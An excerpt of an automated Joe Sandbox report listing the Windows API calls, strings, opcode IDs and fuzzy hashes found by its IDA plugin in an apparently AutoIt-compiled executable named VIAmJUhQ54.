                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 25b0d486867c1c5b48e69f2b88012abe13afbc9ab10e785302f3430988b48366
                                                                                • Instruction ID: 0f80744d6e5bf60334dd9d23e70911a790cf5f3fe07a0d1e9728613b949ec756
                                                                                • Opcode Fuzzy Hash: 25b0d486867c1c5b48e69f2b88012abe13afbc9ab10e785302f3430988b48366
                                                                                • Instruction Fuzzy Hash: 265180B0B68302EBC220EF10D886C69B7B1FB94704F28492BF8479B295DB7DDD45D652
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 1038674560-86951937
                                                                                • Opcode ID: 5330ee52841e5c5203d517de20a8c3b9ab0612299203bc3d686858a4dcc3401e
                                                                                • Instruction ID: f7d9aa67d2b3b5f76c1a0075cc43fc61763af3f5c746833f825776c32e9e5544
                                                                                • Opcode Fuzzy Hash: 5330ee52841e5c5203d517de20a8c3b9ab0612299203bc3d686858a4dcc3401e
                                                                                • Instruction Fuzzy Hash: 9C811871740225FBDB26BB64EC96FBF3769AF24300F044025F905AA183EB6DD946C2A5
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0078C788
                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0078C83E
                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0078C859
                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0078CB15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: 0
                                                                                • API String ID: 2326795674-4108050209
                                                                                • Opcode ID: a628a783ac9691bd6bf82e2111bebe05c02e990177ddb28495c4e9aee59dca40
                                                                                • Instruction ID: 844923a84d27637eb51bded8ad25c52f31a8617724b6bedbd5ab8370e5aede00
                                                                                • Opcode Fuzzy Hash: a628a783ac9691bd6bf82e2111bebe05c02e990177ddb28495c4e9aee59dca40
                                                                                • Instruction Fuzzy Hash: 83F1E370184341AFD726AF24C889BAABBE4FF49354F084529F589D62A1C77CDC44DBB2
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,007BDC00), ref: 00786449
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                • API String ID: 3964851224-45149045
                                                                                • Opcode ID: 1f468e89b3a86ffa821fa7f76678436378122a3078b11cb80bf8dd6dcafb7ddc
                                                                                • Instruction ID: eac1c4572be2f2edb8f05a2ca1a857cf7e25c9da8947bcc5e752a38a1bb0623d
                                                                                • Opcode Fuzzy Hash: 1f468e89b3a86ffa821fa7f76678436378122a3078b11cb80bf8dd6dcafb7ddc
                                                                                • Instruction Fuzzy Hash: 6BC16E30244245EBCB04FF10C555AAE77A5AF94354F144869F8866B3E3EB3CED4ACB92
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 0078D5AE
                                                                                • SetTextColor.GDI32(?,?), ref: 0078D5B2
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0078D5C8
                                                                                • GetSysColor.USER32(0000000F), ref: 0078D5D3
                                                                                • CreateSolidBrush.GDI32(?), ref: 0078D5D8
                                                                                • GetSysColor.USER32(00000011), ref: 0078D5F0
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0078D5FE
                                                                                • SelectObject.GDI32(?,00000000), ref: 0078D60F
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0078D618
                                                                                • SelectObject.GDI32(?,?), ref: 0078D625
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0078D644
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0078D65B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0078D670
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0078D698
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0078D6BF
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0078D6DD
                                                                                • DrawFocusRect.USER32(?,?), ref: 0078D6E8
                                                                                • GetSysColor.USER32(00000011), ref: 0078D6F6
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0078D6FE
                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0078D712
                                                                                • SelectObject.GDI32(?,0078D2A5), ref: 0078D729
                                                                                • DeleteObject.GDI32(?), ref: 0078D734
                                                                                • SelectObject.GDI32(?,?), ref: 0078D73A
                                                                                • DeleteObject.GDI32(?), ref: 0078D73F
                                                                                • SetTextColor.GDI32(?,?), ref: 0078D745
                                                                                • SetBkColor.GDI32(?,?), ref: 0078D74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: e7ba53ba2057240d26a95691472e8edb416f35e487d1ea522e51999714cffc62
                                                                                • Instruction ID: a1ea0607fca2813ca4d08de8ad62ca5a8195bf1f164f897a4fcc97d492d43d49
                                                                                • Opcode Fuzzy Hash: e7ba53ba2057240d26a95691472e8edb416f35e487d1ea522e51999714cffc62
                                                                                • Instruction Fuzzy Hash: 27513C71900208BFDB20AFA4DC48EEE7B79EB49320F218515F916AB2E1D7799E40CF54
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0078B7B0
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0078B7C1
                                                                                • CharNextW.USER32(0000014E), ref: 0078B7F0
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0078B831
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0078B847
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0078B858
                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0078B875
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0078B8C7
                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0078B8DD
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0078B90E
                                                                                • _memset.LIBCMT ref: 0078B933
                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0078B97C
                                                                                • _memset.LIBCMT ref: 0078B9DB
                                                                                • SendMessageW.USER32 ref: 0078BA05
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0078BA5D
                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0078BB0A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0078BB2C
                                                                                • GetMenuItemInfoW.USER32(?), ref: 0078BB76
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0078BBA3
                                                                                • DrawMenuBar.USER32(?), ref: 0078BBB2
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0078BBDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                • String ID: 0
                                                                                • API String ID: 1073566785-4108050209
                                                                                • Opcode ID: 2b1671bf26f92177cfa37831e72c6836e097c67172f309c8a4997aac617e6843
                                                                                • Instruction ID: 3b617bd2d09db9f25779a91af38ced04d7a667469fe187253f3ff2808b4fc9bc
                                                                                • Opcode Fuzzy Hash: 2b1671bf26f92177cfa37831e72c6836e097c67172f309c8a4997aac617e6843
                                                                                • Instruction Fuzzy Hash: 17E1B1B0940219EBDF20EF65CC84EEE7B78FF45750F148156F919AA290DB789A41CF60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Foreground
                                                                                • String ID: ACTIVE$ALL$CLASS$H+}$HANDLE$INSTANCE$L+}$LAST$P+}$REGEXPCLASS$REGEXPTITLE$T+}$TITLE
                                                                                • API String ID: 62970417-1978551418
                                                                                • Opcode ID: a2d96ee71808f697762616c420e464fba544099f0d6388d3e638c1354ab7e945
                                                                                • Instruction ID: 2064eb7e917d89a754e00f9810050584cc8038058fe4482c1b2be125dc7bf2a3
                                                                                • Opcode Fuzzy Hash: a2d96ee71808f697762616c420e464fba544099f0d6388d3e638c1354ab7e945
                                                                                • Instruction Fuzzy Hash: 2DD1B230104646FBCF14FF10E885AAABBB0BF54344F104A29F456675A3DB78E99BCB91
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 0078778A
                                                                                • GetDesktopWindow.USER32 ref: 0078779F
                                                                                • GetWindowRect.USER32(00000000), ref: 007877A6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00787808
                                                                                • DestroyWindow.USER32(?), ref: 00787834
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0078785D
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0078787B
                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007878A1
                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 007878B6
                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007878C9
                                                                                • IsWindowVisible.USER32(?), ref: 007878E9
                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00787904
                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00787918
                                                                                • GetWindowRect.USER32(?,?), ref: 00787930
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00787956
                                                                                • GetMonitorInfoW.USER32 ref: 00787970
                                                                                • CopyRect.USER32(?,?), ref: 00787987
                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 007879F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: e6f018112ef004a60e5ec3e11e7e4aef3558f3cb6600ed3e25b74ecad2e28eec
                                                                                • Instruction ID: 736a1b5b3a2e27f57bbebd2054c480f025ba05aaa1d12e3446c7a0f811afb30c
                                                                                • Opcode Fuzzy Hash: e6f018112ef004a60e5ec3e11e7e4aef3558f3cb6600ed3e25b74ecad2e28eec
                                                                                • Instruction Fuzzy Hash: FCB17C71608350EFDB14EF64C988B5ABBE4BF88310F10891DF59A9B291D778EC04CB96
                                                                                APIs
                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00766CFB
                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00766D21
                                                                                • _wcscpy.LIBCMT ref: 00766D4F
                                                                                • _wcscmp.LIBCMT ref: 00766D5A
                                                                                • _wcscat.LIBCMT ref: 00766D70
                                                                                • _wcsstr.LIBCMT ref: 00766D7B
                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00766D97
                                                                                • _wcscat.LIBCMT ref: 00766DE0
                                                                                • _wcscat.LIBCMT ref: 00766DE7
                                                                                • _wcsncpy.LIBCMT ref: 00766E12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 699586101-1459072770
                                                                                • Opcode ID: 00d2edc353bedc78a875f80e4959e64ecd27630c66a0cc6e75b539fb601468dd
                                                                                • Instruction ID: d3b8381206e0696b24daa9bdf5a43eb15e56fe2798c41acd95643b39f20d690d
                                                                                • Opcode Fuzzy Hash: 00d2edc353bedc78a875f80e4959e64ecd27630c66a0cc6e75b539fb601468dd
                                                                                • Instruction Fuzzy Hash: ED41B4B1A00205FBEB10BB64CD4BEBF777CEF51710F440069F906A6182EB7D9A1196A6
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0073A939
                                                                                • GetSystemMetrics.USER32(00000007), ref: 0073A941
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0073A96C
                                                                                • GetSystemMetrics.USER32(00000008), ref: 0073A974
                                                                                • GetSystemMetrics.USER32(00000004), ref: 0073A999
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0073A9B6
                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0073A9C6
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0073A9F9
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0073AA0D
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 0073AA2B
                                                                                • GetStockObject.GDI32(00000011), ref: 0073AA47
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0073AA52
                                                                                  • Part of subcall function 0073B63C: GetCursorPos.USER32(000000FF), ref: 0073B64F
                                                                                  • Part of subcall function 0073B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0073B66C
                                                                                  • Part of subcall function 0073B63C: GetAsyncKeyState.USER32(00000001), ref: 0073B691
                                                                                  • Part of subcall function 0073B63C: GetAsyncKeyState.USER32(00000002), ref: 0073B69F
                                                                                • SetTimer.USER32(00000000,00000000,00000028,0073AB87), ref: 0073AA79
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: 428b376cd06aeafa40c258f27b007a1e5a63c7e9201a97cfc25db59c4af1d89f
                                                                                • Instruction ID: 5202e3127bffd18a6be7fd2be477ae6ccfd15d41bbabb4dd176576b90b3e843a
                                                                                • Opcode Fuzzy Hash: 428b376cd06aeafa40c258f27b007a1e5a63c7e9201a97cfc25db59c4af1d89f
                                                                                • Instruction Fuzzy Hash: 3AB17E71A0020AEFEB14DFA8DC46BED7BB4FB48314F118129FA55A7290DB78AC50CB55
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00783735
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,007BDC00,00000000,?,00000000,?,?), ref: 007837A3
                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007837EB
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00783874
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00783B94
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00783BA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 536824911-966354055
                                                                                • Opcode ID: 1333e28ba99eacc5196e9dc176c0482a65ec48f50eb3ea01b8777818d594f658
                                                                                • Instruction ID: fa30271381efdaa60441743695fa4430d8d220ed39d622184e04978488477dc2
                                                                                • Opcode Fuzzy Hash: 1333e28ba99eacc5196e9dc176c0482a65ec48f50eb3ea01b8777818d594f658
                                                                                • Instruction Fuzzy Hash: BA0249B5204611DFCB14EF18D859A2AB7E5FF88710F05845DF99A9B3A2CB38ED01CB85
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00786C56
                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00786D16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                • API String ID: 3974292440-719923060
                                                                                • Opcode ID: cc8e48db8f41afe422baacc22a5a49ba628e99762a9d6d4f444cb2487e2a3b57
                                                                                • Instruction ID: e733faa549d9a68fac0bd0f20632d433c3e1893f9553a89bd34fa11d64ba316f
                                                                                • Opcode Fuzzy Hash: cc8e48db8f41afe422baacc22a5a49ba628e99762a9d6d4f444cb2487e2a3b57
                                                                                • Instruction Fuzzy Hash: AEA17C70244345EFCB14FF20D855A6AB3A5BF84310F14496DB896AB3D2DB38EC0ACB61
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0075CF91
                                                                                • __swprintf.LIBCMT ref: 0075D032
                                                                                • _wcscmp.LIBCMT ref: 0075D045
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0075D09A
                                                                                • _wcscmp.LIBCMT ref: 0075D0D6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0075D10D
                                                                                • GetDlgCtrlID.USER32(?), ref: 0075D15F
                                                                                • GetWindowRect.USER32(?,?), ref: 0075D195
                                                                                • GetParent.USER32(?), ref: 0075D1B3
                                                                                • ScreenToClient.USER32(00000000), ref: 0075D1BA
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0075D234
                                                                                • _wcscmp.LIBCMT ref: 0075D248
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0075D26E
                                                                                • _wcscmp.LIBCMT ref: 0075D282
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                • String ID: %s%u
                                                                                • API String ID: 3119225716-679674701
                                                                                • Opcode ID: f5b82d19d9330ece2fc4f421c568d0df4ee457a7d5407999495bdaf5c4748a51
                                                                                • Instruction ID: 627d71bc10a65adc76b4f11a506337ee9f9c9764e09228c7542f16467bfa4222
                                                                                • Opcode Fuzzy Hash: f5b82d19d9330ece2fc4f421c568d0df4ee457a7d5407999495bdaf5c4748a51
